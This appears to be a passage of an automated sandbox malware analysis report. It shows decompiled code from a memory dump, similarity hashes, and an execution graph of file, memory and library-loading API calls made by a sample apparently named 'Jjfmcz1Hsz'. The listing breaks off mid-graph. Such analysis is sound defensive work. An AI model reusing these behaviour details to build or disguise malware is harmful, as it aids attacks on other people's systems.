                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d87e99c
                                                                                                                                                                            0x1d87e9a2
                                                                                                                                                                            0x1d87e9ac
                                                                                                                                                                            0x1d82051f
                                                                                                                                                                            0x1d82052a
                                                                                                                                                                            0x1d87e9b9
                                                                                                                                                                            0x1d8205cd
                                                                                                                                                                            0x1d8205d3
                                                                                                                                                                            0x1d8205d3
                                                                                                                                                                            0x1d87e9bf
                                                                                                                                                                            0x1d82053c
                                                                                                                                                                            0x1d82054d
                                                                                                                                                                            0x1d820559
                                                                                                                                                                            0x1d820562
                                                                                                                                                                            0x1d87e9ce
                                                                                                                                                                            0x1d87e9ce
                                                                                                                                                                            0x1d82056a
                                                                                                                                                                            0x1d82057b
                                                                                                                                                                            0x1d820580
                                                                                                                                                                            0x1d820580
                                                                                                                                                                            0x1d82058f
                                                                                                                                                                            0x1d820597
                                                                                                                                                                            0x1d820598
                                                                                                                                                                            0x1d82059d
                                                                                                                                                                            0x1d8205a1
                                                                                                                                                                            0x1d8205a5
                                                                                                                                                                            0x1d8205ad
                                                                                                                                                                            0x1d8205b3
                                                                                                                                                                            0x1d87e9dd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d87e9ed
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d87e9ed
                                                                                                                                                                            0x1d87e9dd
                                                                                                                                                                            0x1d8205b9
                                                                                                                                                                            0x1d8205be
                                                                                                                                                                            0x1d8205c7
                                                                                                                                                                            0x1d87e9f2
                                                                                                                                                                            0x1d87e9f2
                                                                                                                                                                            0x1d8205c7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8205ad
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d87e9b2
                                                                                                                                                                            0x1d82050c
                                                                                                                                                                            0x1d8204fb
                                                                                                                                                                            0x1d87e989
                                                                                                                                                                            0x1d87e990
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d87e990
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8204fb
                                                                                                                                                                            0x1d8204dc
                                                                                                                                                                            0x1d8204e2
                                                                                                                                                                            0x1d8205d6
                                                                                                                                                                            0x1d8205dc
                                                                                                                                                                            0x1d8204e8
                                                                                                                                                                            0x1d8204e8
                                                                                                                                                                            0x1d8204e8
                                                                                                                                                                            0x1d8204ed
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            • kLsE, xrefs: 1D8205FE
                                                                                                                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1D820586
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                            • API String ID: 3446177414-2547482624
                                                                                                                                                                            • Opcode ID: e6fa5d928e7500fd14efd76a4d532eb93f4dd78c34d07b9ec62264517b8a226f
                                                                                                                                                                            • Instruction ID: 5cad280839b93f830f4ee460ead8183e29e0bd65b4342f695220279d7f1ae618
                                                                                                                                                                            • Opcode Fuzzy Hash: e6fa5d928e7500fd14efd76a4d532eb93f4dd78c34d07b9ec62264517b8a226f
                                                                                                                                                                            • Instruction Fuzzy Hash: 3251CF71A0475ADFC721DFA8C5807ABB7F6AF44304F40853EE69993250E734A586CBA3
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 25%
                                                                                                                                                                            			E1D81DF21(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				void* _v36;
                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                            				char _v60;
                                                                                                                                                                            				char _v64;
                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				intOrPtr _t48;
                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                            				intOrPtr* _t52;
                                                                                                                                                                            				char _t56;
                                                                                                                                                                            				void* _t69;
                                                                                                                                                                            				char _t72;
                                                                                                                                                                            				void* _t73;
                                                                                                                                                                            				intOrPtr _t75;
                                                                                                                                                                            				intOrPtr _t79;
                                                                                                                                                                            				void* _t82;
                                                                                                                                                                            				void* _t84;
                                                                                                                                                                            				intOrPtr _t86;
                                                                                                                                                                            				void* _t88;
                                                                                                                                                                            				signed int _t90;
                                                                                                                                                                            				signed int _t92;
                                                                                                                                                                            				signed int _t93;
                                                                                                                                                                            
                                                                                                                                                                            				_t80 = __edx;
                                                                                                                                                                            				_t92 = (_t90 & 0xfffffff8) - 0x4c;
                                                                                                                                                                            				_v8 =  *0x1d91b370 ^ _t92;
                                                                                                                                                                            				_t72 = 0;
                                                                                                                                                                            				_v72 = __edx;
                                                                                                                                                                            				_t82 = __ecx;
                                                                                                                                                                            				_t86 =  *((intOrPtr*)(__edx + 0xc8));
                                                                                                                                                                            				_v68 = _t86;
                                                                                                                                                                            				E1D868F40( &_v60, 0, 0x30);
                                                                                                                                                                            				_t48 =  *((intOrPtr*)(_t82 + 0x70));
                                                                                                                                                                            				_t93 = _t92 + 0xc;
                                                                                                                                                                            				_v76 = _t48;
                                                                                                                                                                            				_t49 = _t48;
                                                                                                                                                                            				if(_t49 == 0) {
                                                                                                                                                                            					_push(5);
                                                                                                                                                                            					 *((char*)(_t82 + 0x6a)) = 0;
                                                                                                                                                                            					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
                                                                                                                                                                            					goto L3;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t69 = _t49 - 1;
                                                                                                                                                                            					if(_t69 != 0) {
                                                                                                                                                                            						if(_t69 == 1) {
                                                                                                                                                                            							_push(0xa);
                                                                                                                                                                            							goto L3;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t56 = 0;
                                                                                                                                                                            						}
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_push(4);
                                                                                                                                                                            						L3:
                                                                                                                                                                            						_pop(_t50);
                                                                                                                                                                            						_v80 = _t50;
                                                                                                                                                                            						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
                                                                                                                                                                            							L1D832330(_t50, _t86 + 0x1c);
                                                                                                                                                                            							_t79 = _v72;
                                                                                                                                                                            							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                                            							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
                                                                                                                                                                            							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
                                                                                                                                                                            							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
                                                                                                                                                                            							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
                                                                                                                                                                            							E1D8324D0(_t86 + 0x1c);
                                                                                                                                                                            						}
                                                                                                                                                                            						_t75 = _v80;
                                                                                                                                                                            						_t52 =  *((intOrPtr*)(_v72 + 0x20));
                                                                                                                                                                            						_t80 =  *_t52;
                                                                                                                                                                            						_v72 =  *((intOrPtr*)(_t52 + 4));
                                                                                                                                                                            						_v52 =  *((intOrPtr*)(_t82 + 0x68));
                                                                                                                                                                            						_v60 = 0x30;
                                                                                                                                                                            						_v56 = _t75;
                                                                                                                                                                            						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                            						_v76 = _t80;
                                                                                                                                                                            						_v64 = 0x30;
                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                            						if(_t80 != 0) {
                                                                                                                                                                            							 *0x1d9191e0(_t75, _v72,  &_v64,  &_v60);
                                                                                                                                                                            							_t72 = _v76();
                                                                                                                                                                            						}
                                                                                                                                                                            						_t56 = _t72;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				_pop(_t84);
                                                                                                                                                                            				_pop(_t88);
                                                                                                                                                                            				_pop(_t73);
                                                                                                                                                                            				return E1D864B50(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
                                                                                                                                                                            			}


































                                                                                                                                                                            0x1d81df21
                                                                                                                                                                            0x1d81df29
                                                                                                                                                                            0x1d81df33
                                                                                                                                                                            0x1d81df3b
                                                                                                                                                                            0x1d81df40
                                                                                                                                                                            0x1d81df44
                                                                                                                                                                            0x1d81df46
                                                                                                                                                                            0x1d81df52
                                                                                                                                                                            0x1d81df56
                                                                                                                                                                            0x1d81df5b
                                                                                                                                                                            0x1d81df5e
                                                                                                                                                                            0x1d81df61
                                                                                                                                                                            0x1d81df65
                                                                                                                                                                            0x1d81df67
                                                                                                                                                                            0x1d81e058
                                                                                                                                                                            0x1d81e05a
                                                                                                                                                                            0x1d81e05d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d81df6d
                                                                                                                                                                            0x1d81df6d
                                                                                                                                                                            0x1d81df70
                                                                                                                                                                            0x1d87d6ea
                                                                                                                                                                            0x1d87d6f3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d87d6ec
                                                                                                                                                                            0x1d87d6ec
                                                                                                                                                                            0x1d87d6ec
                                                                                                                                                                            0x1d81df76
                                                                                                                                                                            0x1d81df76
                                                                                                                                                                            0x1d81df78
                                                                                                                                                                            0x1d81df78
                                                                                                                                                                            0x1d81df79
                                                                                                                                                                            0x1d81df80
                                                                                                                                                                            0x1d81e019
                                                                                                                                                                            0x1d81e024
                                                                                                                                                                            0x1d81e02c
                                                                                                                                                                            0x1d81e032
                                                                                                                                                                            0x1d81e03b
                                                                                                                                                                            0x1d81e045
                                                                                                                                                                            0x1d81e04b
                                                                                                                                                                            0x1d81e04e
                                                                                                                                                                            0x1d81e04e
                                                                                                                                                                            0x1d81df8d
                                                                                                                                                                            0x1d81df91
                                                                                                                                                                            0x1d81df94
                                                                                                                                                                            0x1d81df99
                                                                                                                                                                            0x1d81dfa0
                                                                                                                                                                            0x1d81dfab
                                                                                                                                                                            0x1d81dfb3
                                                                                                                                                                            0x1d81dfb7
                                                                                                                                                                            0x1d81dfbb
                                                                                                                                                                            0x1d81dfbc
                                                                                                                                                                            0x1d81dfc0
                                                                                                                                                                            0x1d81dfc8
                                                                                                                                                                            0x1d81dfc9
                                                                                                                                                                            0x1d81dfca
                                                                                                                                                                            0x1d81dfcd
                                                                                                                                                                            0x1d81dfe0
                                                                                                                                                                            0x1d81dfea
                                                                                                                                                                            0x1d81dfea
                                                                                                                                                                            0x1d81dfec
                                                                                                                                                                            0x1d81dfec
                                                                                                                                                                            0x1d81df70
                                                                                                                                                                            0x1d81dff2
                                                                                                                                                                            0x1d81dff3
                                                                                                                                                                            0x1d81dff4
                                                                                                                                                                            0x1d81dfff

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                            • String ID: 0$0
                                                                                                                                                                            • API String ID: 3446177414-203156872
                                                                                                                                                                            • Opcode ID: 2b86b6d3c38f72a75fe303b843af1308164137fcaddecd642cb300373d11f453
                                                                                                                                                                            • Instruction ID: 53e1669adc5b3909fcad8200610a2c5011c928b668e7b5e760dca107ecdca139
                                                                                                                                                                            • Opcode Fuzzy Hash: 2b86b6d3c38f72a75fe303b843af1308164137fcaddecd642cb300373d11f453
                                                                                                                                                                            • Instruction Fuzzy Hash: 2B416AB16087469FC301CF2CC484A5ABBE5FB89714F008A6EF588DB351D771EA09CB96
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:3.6%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:1.3%
                                                                                                                                                                            Signature Coverage:0.9%
                                                                                                                                                                            Total number of Nodes:1266
                                                                                                                                                                            Total number of Limit Nodes:139
                                                                                                                                                                            execution_graph 83161 2f37ac0 83162 2f37ae5 83161->83162 83194 2f4c110 83162->83194 83165 2f37b39 83166 2f37bba 83215 2f3e010 LdrLoadDll NtClose 83166->83215 83170 2f37b68 83172 2f37be6 83170->83172 83202 2f3bd20 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 83170->83202 83171 2f37bd5 83173 2f37bf2 83171->83173 83174 2f37bdc 83171->83174 83219 2f4c190 LdrLoadDll 83173->83219 83216 2f4c890 83174->83216 83177 2f37b82 83177->83172 83203 2f378f0 83177->83203 83180 2f37c1d 83220 2f3bd20 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 83180->83220 83183 2f37c3d 83183->83172 83221 2f4c1c0 LdrLoadDll 83183->83221 83185 2f37c62 83222 2f4c250 LdrLoadDll 83185->83222 83187 2f37c7c 83223 2f4c220 LdrLoadDll 83187->83223 83189 2f37c8b 83190 2f4c890 2 API calls 83189->83190 83191 2f37c95 83190->83191 83224 2f376c0 13 API calls 83191->83224 83193 2f37ca9 83225 2f4d3d0 83194->83225 83196 2f37b2f 83196->83165 83196->83166 83197 2f4c300 83196->83197 83198 2f4d3d0 LdrLoadDll 83197->83198 83199 2f4c31c 83198->83199 83200 2f37b5d 83199->83200 83235 3982b2a 83199->83235 83200->83166 83200->83170 83202->83177 83204 2f37906 83203->83204 83238 2f4bc30 83204->83238 83206 2f3791f 83207 2f37a91 83206->83207 83259 2f374d0 10 API calls 83206->83259 83209 2f37a05 83209->83207 83260 2f376c0 13 API calls 83209->83260 83211 2f37a33 83211->83207 83212 2f4c300 2 API calls 83211->83212 83213 2f37a68 83212->83213 83213->83207 83261 2f4c900 LdrLoadDll 83213->83261 83215->83171 83217 2f4d3d0 LdrLoadDll 83216->83217 83218 2f4c8ac NtClose 83217->83218 83218->83172 83219->83180 83220->83183 83221->83185 83222->83187 83223->83189 83224->83193 83227 2f4d455 83225->83227 83228 2f4d3df 83225->83228 83227->83196 83228->83227 83229 2f47340 83228->83229 83230 2f4735a 83229->83230 83231 2f4734e 83229->83231 83230->83227 83231->83230 83234 2f477c0 LdrLoadDll 83231->83234 83233 2f474ac 83233->83227 83234->83233 83236 3982b3f LdrInitializeThunk 83235->83236 83237 3982b31 83235->83237 83236->83200 83237->83200 83262 2f4e3f0 83238->83262 83240 2f4bc47 83265 2f39220 83240->83265 83242 2f4bc62 83243 2f4bc97 83242->83243 83244 2f4bc83 83242->83244 83271 2f4e290 83243->83271 83274 2f4e310 83244->83274 83249 2f4e290 2 API calls 83250 2f4bd17 83249->83250 83256 2f4bfe7 83250->83256 83277 2f4e2d0 LdrLoadDll 83250->83277 83252 2f4bfcc 83253 2f4bfd3 83252->83253 83252->83256 83254 2f4e310 2 API calls 83253->83254 83255 2f4bfdd 83254->83255 83255->83206 83257 2f4e310 2 API calls 83256->83257 83258 2f4c03c 83257->83258 83258->83206 83259->83209 83260->83211 83261->83207 83278 2f4ca30 83262->83278 83264 2f4e408 83264->83240 83266 2f39245 83265->83266 83281 2f3abd0 83266->83281 83270 2f3929d 83270->83242 83308 2f4c940 83271->83308 83273 2f4bcfe 83273->83249 83311 2f4ca70 83274->83311 83276 2f4bc8d 83276->83206 83277->83252 83279 2f4d3d0 LdrLoadDll 83278->83279 83280 2f4ca4c RtlAllocateHeap 83279->83280 83280->83264 83282 2f3abf4 83281->83282 83283 2f3ac30 LdrLoadDll 83282->83283 83284 2f39278 83282->83284 83283->83284 83284->83270 83285 2f3c750 83284->83285 83286 2f3c77c 83285->83286 83296 2f4c5e0 83286->83296 83289 2f3c79c 83289->83270 83293 2f3c7d7 83294 2f4c890 2 API calls 83293->83294 83295 2f3c7fa 83294->83295 83295->83270 83297 2f4d3d0 LdrLoadDll 83296->83297 83298 2f3c795 83297->83298 83298->83289 83299 2f4c620 83298->83299 83300 2f4d3d0 LdrLoadDll 83299->83300 83301 2f4c63c 83300->83301 83307 3982bc0 LdrInitializeThunk 83301->83307 83302 2f3c7bf 83302->83289 83304 2f4cc10 83302->83304 83305 2f4d3d0 LdrLoadDll 83304->83305 83306 2f4cc2f 83305->83306 83306->83293 83307->83302 83309 2f4d3d0 LdrLoadDll 83308->83309 83310 2f4c95c NtAllocateVirtualMemory 83309->83310 83310->83273 83312 2f4d3d0 LdrLoadDll 83311->83312 83313 2f4ca8c RtlFreeHeap 83312->83313 83313->83276 83314 2f4b430 83315 2f4e290 2 API calls 83314->83315 83317 2f4b46b 83315->83317 83316 2f4b566 83317->83316 83318 2f3abd0 LdrLoadDll 83317->83318 83319 2f4b4ab 83318->83319 83320 2f47340 LdrLoadDll 83319->83320 83324 2f4b4ca 83320->83324 83321 2f4b4e0 Sleep 83321->83324 83324->83316 83324->83321 83325 2f4b0a0 LdrLoadDll 83324->83325 83326 2f4b280 LdrLoadDll 83324->83326 83325->83324 83326->83324 83327 39829f0 LdrInitializeThunk 83331 2f517dd 83334 2f4dec0 83331->83334 83335 2f4dee6 83334->83335 83342 2f39bf0 83335->83342 83337 2f4def2 83340 2f4df16 83337->83340 83350 2f38c00 83337->83350 83382 2f4cab0 83340->83382 83385 2f39b40 83342->83385 83344 2f39bfd 83345 2f39c04 83344->83345 83397 2f39ae0 83344->83397 83345->83337 83351 2f38c27 83350->83351 83816 2f3b0a0 83351->83816 83353 2f38c39 83820 2f3adf0 83353->83820 83355 2f38c56 83363 2f38c5d 83355->83363 83865 2f3ad20 LdrLoadDll 83355->83865 83357 2f38f0d 83357->83340 83359 2f38ccc 83359->83357 83360 2f4e3f0 2 API calls 83359->83360 83361 2f38ce2 83360->83361 83362 2f4e3f0 2 API calls 83361->83362 83364 2f38cf3 83362->83364 83363->83357 83824 2f3de30 83363->83824 83365 2f4e3f0 2 API calls 83364->83365 83366 2f38d04 83365->83366 83836 2f3c2e0 83366->83836 83368 2f38d11 83369 2f46f30 10 API calls 83368->83369 83370 2f38d23 83369->83370 83371 2f46f30 10 API calls 83370->83371 83372 2f38d33 83371->83372 83373 2f38d55 83372->83373 83375 2f46f30 10 API calls 83372->83375 83374 2f46f30 10 API calls 83373->83374 83381 2f38d98 83373->83381 83378 2f38d6a 83374->83378 83376 2f38d4e 83375->83376 83866 2f3c430 LdrLoadDll 83376->83866 83378->83381 83867 2f3cd90 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 83378->83867 83381->83357 83848 2f38880 83381->83848 83383 2f4d3d0 LdrLoadDll 83382->83383 83384 2f4cacf 83383->83384 83416 2f4afc0 83385->83416 83389 2f39b66 83389->83344 83390 2f39b5c 83390->83389 83423 2f4d780 83390->83423 83392 2f39ba3 83392->83389 83434 2f39980 83392->83434 83394 2f39bc3 83440 2f393e0 LdrLoadDll 83394->83440 83396 2f39bd5 83396->83344 83797 2f4da70 83397->83797 83400 2f4da70 LdrLoadDll 83401 2f39b0b 83400->83401 83402 2f4da70 LdrLoadDll 83401->83402 83403 2f39b21 83402->83403 83404 2f3dbf0 83403->83404 83405 2f3dc09 83404->83405 83801 2f3af20 83405->83801 83407 2f3dc1c 83408 2f4c5e0 LdrLoadDll 83407->83408 83409 2f3dc2b 83408->83409 83410 2f39c15 83409->83410 83805 2f4cbd0 83409->83805 83410->83337 83412 2f3dc42 83413 2f3dc6d 83412->83413 83809 2f4c660 83412->83809 83415 2f4c890 2 API calls 83413->83415 83415->83410 83417 2f4afcf 83416->83417 83418 2f47340 LdrLoadDll 83417->83418 83419 2f39b53 83418->83419 83420 2f4ae70 83419->83420 83441 2f4ca00 83420->83441 83424 2f4d799 83423->83424 83444 2f46f30 83424->83444 83426 2f4d7b1 83427 2f4d7ba 83426->83427 83483 2f4d5c0 83426->83483 83427->83392 83429 2f4d7ce 83429->83427 83430 2f4c300 2 API calls 83429->83430 83431 2f4d802 83430->83431 83432 2f4e310 2 API calls 83431->83432 83433 2f4d829 83432->83433 83433->83392 83775 2f371d0 83434->83775 83436 2f399a1 83436->83394 83437 2f3999a 83437->83436 83788 2f37490 83437->83788 83440->83396 83442 2f4d3d0 LdrLoadDll 83441->83442 83443 2f4ae85 83442->83443 83443->83390 83445 2f47273 83444->83445 83446 2f46f44 83444->83446 83445->83426 83446->83445 83500 2f4c050 83446->83500 83449 2f47075 83506 2f4c760 83449->83506 83450 2f47058 83503 2f4c860 83450->83503 83453 2f47062 83453->83426 83454 2f4709c 83455 2f4e310 2 API calls 83454->83455 83456 2f470a8 83455->83456 83456->83453 83457 2f47237 83456->83457 83459 2f4724d 83456->83459 83463 2f47140 83456->83463 83458 2f4c890 2 API calls 83457->83458 83460 2f4723e 83458->83460 83563 2f46c50 83459->83563 83460->83426 83462 2f47260 83462->83426 83464 2f471a7 83463->83464 83466 2f4714f 83463->83466 83464->83457 83465 2f471ba 83464->83465 83602 2f4c6e0 83465->83602 83468 2f47154 83466->83468 83469 2f47168 83466->83469 83601 2f46b10 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 83468->83601 83470 2f47185 83469->83470 83471 2f4716d 83469->83471 83470->83460 83521 2f468d0 83470->83521 83509 2f46bb0 83471->83509 83476 2f4715e 83476->83426 83477 2f4717b 83477->83426 83479 2f4721a 83481 2f4c890 2 API calls 83479->83481 83480 2f4719d 83480->83426 83482 2f47226 83481->83482 83482->83426 83484 2f4d5db 83483->83484 83485 2f4d5ed 83484->83485 83486 2f4e290 2 API calls 83484->83486 83485->83429 83487 2f4d60d 83486->83487 83623 2f46520 83487->83623 83489 2f4d630 83489->83485 83490 2f46520 3 API calls 83489->83490 83492 2f4d652 83490->83492 83492->83485 83655 2f47880 83492->83655 83493 2f4d6da 83494 2f4d6ea 83493->83494 83750 2f4d350 LdrLoadDll 83493->83750 83666 2f4d1c0 83494->83666 83497 2f4d718 83745 2f4c2c0 83497->83745 83501 2f4d3d0 LdrLoadDll 83500->83501 83502 2f47029 83501->83502 83502->83449 83502->83450 83502->83453 83504 2f4d3d0 LdrLoadDll 83503->83504 83505 2f4c87c NtDeleteFile 83504->83505 83505->83453 83507 2f4d3d0 LdrLoadDll 83506->83507 83508 2f4c77c NtCreateFile 83507->83508 83508->83454 83510 2f46bcc 83509->83510 83511 2f4c6e0 LdrLoadDll 83510->83511 83512 2f46bed 83511->83512 83513 2f46bf4 83512->83513 83514 2f46c08 83512->83514 83516 2f4c890 2 API calls 83513->83516 83515 2f4c890 2 API calls 83514->83515 83517 2f46c11 83515->83517 83518 2f46bfd 83516->83518 83606 2f4e430 LdrLoadDll RtlAllocateHeap 83517->83606 83518->83477 83520 2f46c1c 83520->83477 83522 2f4694e 83521->83522 83523 2f4691b 83521->83523 83525 2f46a99 83522->83525 83529 2f4696a 83522->83529 83524 2f4c6e0 LdrLoadDll 83523->83524 83526 2f46936 83524->83526 83527 2f4c6e0 LdrLoadDll 83525->83527 83528 2f4c890 2 API calls 83526->83528 83533 2f46ab4 83527->83533 83530 2f4693f 83528->83530 83531 2f4c6e0 LdrLoadDll 83529->83531 83530->83480 83532 2f46985 83531->83532 83535 2f469a1 83532->83535 83536 2f4698c 83532->83536 83616 2f4c720 LdrLoadDll 83533->83616 83537 2f469a6 83535->83537 83545 2f469bc 83535->83545 83539 2f4c890 2 API calls 83536->83539 83541 2f4c890 2 API calls 83537->83541 83538 2f46aee 83542 2f4c890 2 API calls 83538->83542 83540 2f46995 83539->83540 83540->83480 83544 2f469af 83541->83544 83543 2f46af9 83542->83543 83543->83480 83544->83480 83547 2f469c1 83545->83547 83548 2f4e3f0 2 API calls 83545->83548 83551 2f469d3 83547->83551 83607 2f4c810 83547->83607 83548->83547 83549 2f46a27 83550 2f46a3e 83549->83550 83615 2f4c6a0 LdrLoadDll 83549->83615 83553 2f46a45 83550->83553 83554 2f46a5a 83550->83554 83551->83480 83555 2f4c890 2 API calls 83553->83555 83556 2f4c890 2 API calls 83554->83556 83555->83551 83557 2f46a63 83556->83557 83558 2f46a8f 83557->83558 83610 2f4e110 83557->83610 83558->83480 83560 2f46a7a 83561 2f4e310 2 API calls 83560->83561 83562 2f46a83 83561->83562 83562->83480 83564 2f4c6e0 LdrLoadDll 83563->83564 83565 2f46c8e 83564->83565 83566 2f46c97 83565->83566 83567 2f46cac 83565->83567 83568 2f4c890 2 API calls 83566->83568 83569 2f46cd0 83567->83569 83570 2f46d1a 83567->83570 83582 2f46ca0 83568->83582 83571 2f4c7c0 2 API calls 83569->83571 83572 2f46d60 83570->83572 83573 2f46d1f 83570->83573 83574 2f46cf5 83571->83574 83575 2f46d72 83572->83575 83581 2f46eed 83572->83581 83577 2f4c810 2 API calls 83573->83577 83573->83582 83576 2f4c890 2 API calls 83574->83576 83578 2f46d77 83575->83578 83588 2f46db2 83575->83588 83576->83582 83579 2f46d4a 83577->83579 83580 2f4c7c0 2 API calls 83578->83580 83583 2f4c890 2 API calls 83579->83583 83584 2f46d9a 83580->83584 83581->83582 83585 2f4c890 2 API calls 83581->83585 83582->83462 83586 2f46d53 83583->83586 83589 2f4c890 2 API calls 83584->83589 83590 2f46f1e 83585->83590 83586->83462 83587 2f46db7 83587->83582 83592 2f4c7c0 2 API calls 83587->83592 83588->83587 83596 2f46e96 83588->83596 83591 2f46da3 83589->83591 83590->83462 83591->83462 83593 2f46dda 83592->83593 83594 2f4c890 2 API calls 83593->83594 83595 2f46de5 83594->83595 83595->83462 83596->83582 83617 2f4c7c0 83596->83617 83599 2f4c890 2 API calls 83600 2f46ede 83599->83600 83600->83462 83601->83476 83603 2f4d3d0 LdrLoadDll 83602->83603 83604 2f47202 83603->83604 83605 2f4c720 LdrLoadDll 83604->83605 83605->83479 83606->83520 83608 2f4d3d0 LdrLoadDll 83607->83608 83609 2f4c82c NtReadFile 83608->83609 83609->83549 83611 2f4e134 83610->83611 83612 2f4e11d 83610->83612 83611->83560 83612->83611 83613 2f4e3f0 2 API calls 83612->83613 83614 2f4e14b 83613->83614 83614->83560 83615->83550 83616->83538 83618 2f4d3d0 LdrLoadDll 83617->83618 83619 2f4c7dc 83618->83619 83622 3982a10 LdrInitializeThunk 83619->83622 83620 2f46ed5 83620->83599 83622->83620 83624 2f46531 83623->83624 83625 2f46539 83623->83625 83624->83489 83654 2f4680c 83625->83654 83751 2f4f3d0 83625->83751 83627 2f4658d 83628 2f4f3d0 2 API calls 83627->83628 83631 2f46598 83628->83631 83629 2f465e6 83632 2f4f3d0 2 API calls 83629->83632 83631->83629 83633 2f4f500 3 API calls 83631->83633 83762 2f4f470 LdrLoadDll RtlAllocateHeap RtlFreeHeap 83631->83762 83635 2f465fa 83632->83635 83633->83631 83634 2f46657 83636 2f4f3d0 2 API calls 83634->83636 83635->83634 83756 2f4f500 83635->83756 83638 2f4666d 83636->83638 83639 2f466aa 83638->83639 83641 2f4f500 3 API calls 83638->83641 83640 2f4f3d0 2 API calls 83639->83640 83642 2f466b5 83640->83642 83641->83638 83643 2f4f500 3 API calls 83642->83643 83650 2f466ef 83642->83650 83643->83642 83645 2f467e4 83764 2f4f430 LdrLoadDll RtlFreeHeap 83645->83764 83647 2f467ee 83765 2f4f430 LdrLoadDll RtlFreeHeap 83647->83765 83649 2f467f8 83766 2f4f430 LdrLoadDll RtlFreeHeap 83649->83766 83763 2f4f430 LdrLoadDll RtlFreeHeap 83650->83763 83652 2f46802 83767 2f4f430 LdrLoadDll RtlFreeHeap 83652->83767 83654->83489 83656 2f47891 83655->83656 83657 2f46f30 10 API calls 83656->83657 83661 2f478a7 83657->83661 83658 2f478b0 83658->83493 83659 2f478e7 83660 2f4e310 2 API calls 83659->83660 83662 2f478f8 83660->83662 83661->83658 83661->83659 83663 2f47933 83661->83663 83662->83493 83664 2f4e310 2 API calls 83663->83664 83665 2f47938 83664->83665 83665->83493 83768 2f4d050 83666->83768 83668 2f4d1d4 83669 2f4d050 LdrLoadDll 83668->83669 83670 2f4d1dd 83669->83670 83671 2f4d050 LdrLoadDll 83670->83671 83672 2f4d1e6 83671->83672 83673 2f4d050 LdrLoadDll 83672->83673 83674 2f4d1ef 83673->83674 83675 2f4d050 LdrLoadDll 83674->83675 83676 2f4d1f8 83675->83676 83677 2f4d050 LdrLoadDll 83676->83677 83678 2f4d201 83677->83678 83679 